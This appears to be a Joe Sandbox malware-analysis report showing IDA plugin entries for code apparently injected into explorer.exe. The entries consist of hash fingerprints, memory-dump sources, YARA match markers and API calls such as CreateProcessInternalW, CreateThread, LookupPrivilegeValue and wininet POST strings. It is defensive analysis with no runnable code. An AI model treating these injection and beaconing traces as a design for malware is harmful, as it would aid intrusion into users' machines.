                                                                                                                      • Opcode ID: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
                                                                                                                      • Instruction ID: 896d9dd38b12a8d2f8df0e19dae3e1e65955413eaa0a21e2938308ce2afa345b
                                                                                                                      • Opcode Fuzzy Hash: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
                                                                                                                      • Instruction Fuzzy Hash: 0290027120140402F1007598540864600568BE0706F55D021B5029555EC665D9917131
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
                                                                                                                      • Instruction ID: 5f9aefbc82ec95f36fa7f8dfbbeb047e6b7a51e85d17ae41c66951cb6ca45ac0
                                                                                                                      • Opcode Fuzzy Hash: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
                                                                                                                      • Instruction Fuzzy Hash: 3590027120140842F10071584404B4600568BE0706F55C026B0129654D8615D9517531
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
                                                                                                                      • Instruction ID: 2fb9c67340e05b3103bb923354a579ca28a56829b0365945dd479b77ca7fa5b5
                                                                                                                      • Opcode Fuzzy Hash: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
                                                                                                                      • Instruction Fuzzy Hash: A690027120148802F1107158840474A00568BD0706F59C421B4429658D8695D9917131
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
                                                                                                                      • Instruction ID: a0f80e3959003401eb7aec2bb6f40d2648c03c765fd7e5d2506877fcdcb2c7e0
                                                                                                                      • Opcode Fuzzy Hash: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
                                                                                                                      • Instruction Fuzzy Hash: B3900261242441527545B158440450740579BE0646795C022B1419950C8526E956E631
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
                                                                                                                      • Instruction ID: b488813549bea6a067784fc41d98d79983e0a576c70e6a32d6843ca4c0a9218a
                                                                                                                      • Opcode Fuzzy Hash: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
                                                                                                                      • Instruction Fuzzy Hash: 6E90027120140413F11171584504707005A8BD0646F95C422B0429558D9656DA52B131
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
                                                                                                                      • Instruction ID: 793021dedcb5c9282876f8790727537f20f964cc1f1fb948afd62f5370d5543d
                                                                                                                      • Opcode Fuzzy Hash: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
                                                                                                                      • Instruction Fuzzy Hash: 5290026921340002F1807158540860A00568BD1607F95D425B001A558CC915D9696331
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
                                                                                                                      • Instruction ID: 529cf1827c85a054d84a3eafbb97df6cc8314552be32e743576fe65782ee05c5
                                                                                                                      • Opcode Fuzzy Hash: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
                                                                                                                      • Instruction Fuzzy Hash: 489002B120140402F1407158440474600568BD0706F55C021B5069554E8659DED57675
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
                                                                                                                      • Instruction ID: c2c9070b21da3e21df0536210b907ca179fbe4e34876676b076d43aed0caf181
                                                                                                                      • Opcode Fuzzy Hash: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
                                                                                                                      • Instruction Fuzzy Hash: B7900261211C0042F20075684C14B0700568BD0707F55C125B0159554CC915D9616531
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
                                                                                                                      • Instruction ID: 395e9dc8aa14cec5c4cd82248d9bf66357e1380b691d2e2c95adc8fd47ad85e0
                                                                                                                      • Opcode Fuzzy Hash: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
                                                                                                                      • Instruction Fuzzy Hash: F49002A134140442F10071584414B060056CBE1706F55C025F1069554D8619DD527136
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
• Instruction ID: c2b31d3ca046f5c26df60e6086cc385bc5e4cf02e4349ae6e5aa088a1f920a2c
• Opcode Fuzzy Hash: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
• Instruction Fuzzy Hash: 2B900265211400032105B558070450700978BD5756355C031F101A550CD621D9616131
APIs
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 056315f1ade2bfd10fb39795e1e03670f78c388cc0e7ffdd4864f268e19224b3
• Instruction ID: f2b43eedf3fdba7c6e831011f6c1c9234ea118131e13dc82f41e6f4ee7570ea6
• Opcode Fuzzy Hash: 056315f1ade2bfd10fb39795e1e03670f78c388cc0e7ffdd4864f268e19224b3
• Instruction Fuzzy Hash: 7690027120544842F14071584404A4600668BD070AF55C021B0069694D9625DE55B671
APIs
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b3d2a5049eb6839c64c97f2a190eb59c8f1504302128a8d62f628b1a720867d3
• Instruction ID: 0c14561deaad2e492e8a179939a984ace5f5d7a71d2154125500b0af318f61f9
• Opcode Fuzzy Hash: b3d2a5049eb6839c64c97f2a190eb59c8f1504302128a8d62f628b1a720867d3
• Instruction Fuzzy Hash: 1190027120140802F1807158440464A00568BD1706F95C025B002A654DCA15DB5977B1
APIs
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
• Instruction ID: 068887229c4c55ea2f2ef18539f5dbcccc909e148627cc809c6c8c3d48da25c5
• Opcode Fuzzy Hash: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
• Instruction Fuzzy Hash: E59002A120240003610571584414616405B8BE0606B55C031F1019590DC525D9917135
APIs
Memory Dump Source
• Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
• Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
• Instruction ID: 8e103ff02c826e39365fa7df72148f4626f416f790ad014e4d6ed31306691c56
• Opcode Fuzzy Hash: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
• Instruction Fuzzy Hash: F090027160550402F1007158451470610568BD0606F65C421B0429568D8795DA5175B2

Control-flow Graph (entry block 2969039; graph rendering not reproduced)
APIs
• Sleep.KERNELBASE(000007D0), ref: 029690E8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: POST$net.dll$wininet.dll
• API String ID: 3472027048-3140911592
• Opcode ID: 551f66d44a5d7f168169c0bb73eb4f89d905b09f26124cb34596392b10a6ec33
• Instruction ID: 665a11a64a38aba88ce47e33dd47f81462b6c3744907fe44bbd74fddfd0c4010
• Opcode Fuzzy Hash: 551f66d44a5d7f168169c0bb73eb4f89d905b09f26124cb34596392b10a6ec33
• Instruction Fuzzy Hash: 6B31E0B2504304AFD714EF64C889FBBB7F9EF88704F108159E619AB241D774A510CBA5

Control-flow Graph (entry block 2969040; graph rendering not reproduced)
APIs
• Sleep.KERNELBASE(000007D0), ref: 029690E8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: b4243497dee9f50da5ed6b6fc494d7eb823281042cf5996cc4f9cda683b11d1f
• Instruction ID: 2abbb124c2b46dfb756548242947e9384b965f25f9acad213b985bbfb5a49f36
• Opcode Fuzzy Hash: b4243497dee9f50da5ed6b6fc494d7eb823281042cf5996cc4f9cda683b11d1f
• Instruction Fuzzy Hash: 1531A1B2500744BBD724DF64C889F77B7F9BB88B00F10841DF62AAB244DB30A550CBA8

Control-flow Graph (entry block 296a630; graph rendering not reproduced)
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02953AF8), ref: 0296A65D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: ca6c44034b91d1748c90520b627248f14defcc393b71aa71cd584a2c5631ef16
• Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction Fuzzy Hash: C8E046B2200208AFDB18EF99DC48EA777ADEF88750F018558FE086B241C630F910CAF0

Control-flow Graph (entry block 29582d4; graph rendering not reproduced)
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: d40bfc7a5c7e4afdaa4aedb19b80ea6ab26954b76910d40c4718f2e5288cc79f
• Instruction ID: 4094a865df59fa441b243621675c49f767f963b4d2322a836a7137b289c6ad4e
• Opcode Fuzzy Hash: d40bfc7a5c7e4afdaa4aedb19b80ea6ab26954b76910d40c4718f2e5288cc79f
• Instruction Fuzzy Hash: A4012D3174023977D721E9A45C01FFE7359BB84754F090155FE04EB181E6645D064BE5

Control-flow Graph (entry block 295830c; graph rendering not reproduced)
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: cdf84c750018856d3ec9547f99c615ced0663a69555afef17971b88368436077
• Instruction ID: 290bfb0cd6529c8a8ee893af1360f599b90a36c355e32073fc78c4bf115d2de2
• Opcode Fuzzy Hash: cdf84c750018856d3ec9547f99c615ced0663a69555afef17971b88368436077
• Instruction Fuzzy Hash: 3901F771A812287BE721E6D08C02FFE776DAB41B55F040119FF04FA1C1E6A42A064BF5

Control-flow Graph (entry block 2958310; graph rendering not reproduced)
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
Memory Dump Source
• Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: e2c2d1279036287ff070805d3bcb2bf8543f74bc46c2f0033316a114a3a577a2
• Instruction ID: e5ef4d5f00599e39fb63b62fab922325245bbd2fedb233a277f727459087b06b
• Opcode Fuzzy Hash: e2c2d1279036287ff070805d3bcb2bf8543f74bc46c2f0033316a114a3a577a2
• Instruction Fuzzy Hash: CE01D671B8122877E721EAD49C06FFF776D6B80B51F040119FF04BA1C1E6A469064BF6

                                                                                                                      Control-flow Graph
                                                                                                                      control_flow_graph 622 2958393-2958394 call 296c9c0 626 2958343-295835a call 2964e40 622->626 627 295833e call 295ace0 622->627 631 295835c-295836e PostThreadMessageW 626->631 632 295838e-2958392 626->632 627->626 633 2958370-295838b call 295a470 PostThreadMessageW 631->633 634 295838d 631->634 633->634 634->632
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 21b561e7148d800360665b29aa3ded65db0ad955a97258f5bc03fc797e462292
                                                                                                                      • Instruction ID: 072c4dd3d724bfecc9d381e1e1ab41247e401d12d0235f4631ff55148bb87442
                                                                                                                      • Opcode Fuzzy Hash: 21b561e7148d800360665b29aa3ded65db0ad955a97258f5bc03fc797e462292
                                                                                                                      • Instruction Fuzzy Hash: A0F02231B8123877E721AA948C02FBE27596B81B50F080659FE44BA1C0D6A569074BE5
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0296A6F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                      • Instruction ID: 1586fa81080315e908686cd89f400b7fdc718ed43a391f585199ea5490cdfc4f
                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                      • Instruction Fuzzy Hash: A201AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0295F040,?,?,00000000), ref: 029691AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                      • Instruction ID: 0cead655a3edccc4eaa7fcee1062d77fcafcf8983c7962fc9fa9bc556d7da9ff
                                                                                                                      • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                      • Instruction Fuzzy Hash: 3DE06D333902043AE2306599AC02FA7B39D8B91B60F150026FA0DEB6C0D595F40146A4
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0295F1C2,0295F1C2,?,00000000,?,?), ref: 0296A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                      • Instruction ID: 4d99c486b009668040620aae2b01288ee77623bbf27b511c8253a6d9bffc402d
                                                                                                                      • Opcode Fuzzy Hash: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                      • Instruction Fuzzy Hash: A6F0EDB2200204ABDB24DF54DC85EE733A9EF89314F1080A9F90D6B241CA35A805CBB0
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0295F1C2,0295F1C2,?,00000000,?,?), ref: 0296A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                      • Instruction ID: 8b2e9aff7b51e615537f47cdf36dceabca11d4af3788c01cef7ff03305291023
                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                      • Instruction Fuzzy Hash: 57E01AB22002086BDB10DF89DC84EE737ADAF88650F018164BA0867241C930E8108BF5
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02964526,?,02964C9F,02964C9F,?,02964526,?,?,?,?,?,00000000,00000000,?), ref: 0296A61D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                      • Instruction ID: af88ccdeab70f99ef9814725a107db868c53baaafab7f6527cef462555a4822a
                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                      • Instruction Fuzzy Hash: CCE012B2200208ABDB14EF99DC44EA777ADAF88654F118558BA086B241C630F9108AB0
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,02958D14,?), ref: 0295F6EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
